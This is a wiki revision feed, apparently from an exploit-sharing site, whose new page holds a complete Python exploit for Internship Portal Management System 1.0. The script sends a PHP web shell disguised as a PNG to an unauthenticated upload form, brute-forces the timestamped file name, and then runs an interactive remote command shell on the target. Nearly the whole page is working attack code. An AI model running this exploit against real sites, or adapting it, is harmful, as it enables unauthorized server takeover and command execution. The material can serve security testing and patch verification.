https://pwnwiki.com/index.php?action=history&feed=atom&title=Internship_Portal_Management_System_1.0_%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
Internship Portal Management System 1.0 未經身份驗證文件上傳&任意代碼執行漏洞 - Revision history
2026-04-11T01:38:42Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Internship_Portal_Management_System_1.0_%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=2215&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated) # Date: 2021-05-04 # Exploit Author: argeneste..."
2021-05-04T08:30:14Z
<p>Created page with "==EXP== <pre> # Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated) # Date: 2021-05-04 # Exploit Author: argeneste..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)<br />
# Date: 2021-05-04<br />
# Exploit Author: argenestel<br />
# Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html<br />
# Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code<br />
# Version: 1.0<br />
# Tested on: Debian 10<br />
<br />
import requests<br />
import time<br />
<br />
#change the url to the site running the vulnerable system<br />
url="http://127.0.0.1:4000"<br />
#burp proxy<br />
proxies = {<br />
"http": "http://127.0.0.1:8080",<br />
}<br />
#payload<br />
payload='<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'<br />
<br />
#the upload point<br />
insert_url=url+"/inserty.php"<br />
<br />
def fill_details():<br />
global payload<br />
global shellend<br />
global shellstart<br />
print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload")<br />
#time start<br />
shellstart=int(time.time())<br />
#print(shellstart)<br />
files = {'file':('shell.php',payload,<br />
'image/png', {'Content-Disposition': 'form-data'}<br />
)<br />
}<br />
data = {<br />
"company_name":"some",<br />
"first_name":"some",<br />
"last_name":"some",<br />
"email":"some@some.com",<br />
"gender":"Male",<br />
"insert_button":"Apply",<br />
"terms":"on"<br />
}<br />
r = requests.post(insert_url, data=data, files=files)<br />
if r.status_code == 200:<br />
print("Exploited Intern System Successfully...")<br />
shellend = int(time.time())<br />
#print(shellend)<br />
shell()<br />
else:<br />
print("Exploit Failed")<br />
<br />
def shell():<br />
for shellname in range(shellstart, shellend+1):<br />
shellstr=str(shellname)<br />
shell_url=url+"/upload/"+shellstr+"_shell.php"<br />
r = requests.get(shell_url)<br />
if r.status_code == 200:<br />
shell_url=url+"/upload/"+shellstr+"_shell.php"<br />
break<br />
<br />
r = requests.get(shell_url)<br />
if r.status_code == 200:<br />
print("Shell Starting...")<br />
while True:<br />
cmd=input("cmd$ ")<br />
r = requests.get(shell_url+"?cmd="+cmd)<br />
print(r.text)<br />
else:<br />
print("File Name Error")<br />
<br />
<br />
fill_details()<br />
<br />
</pre></div>
Pwnwiki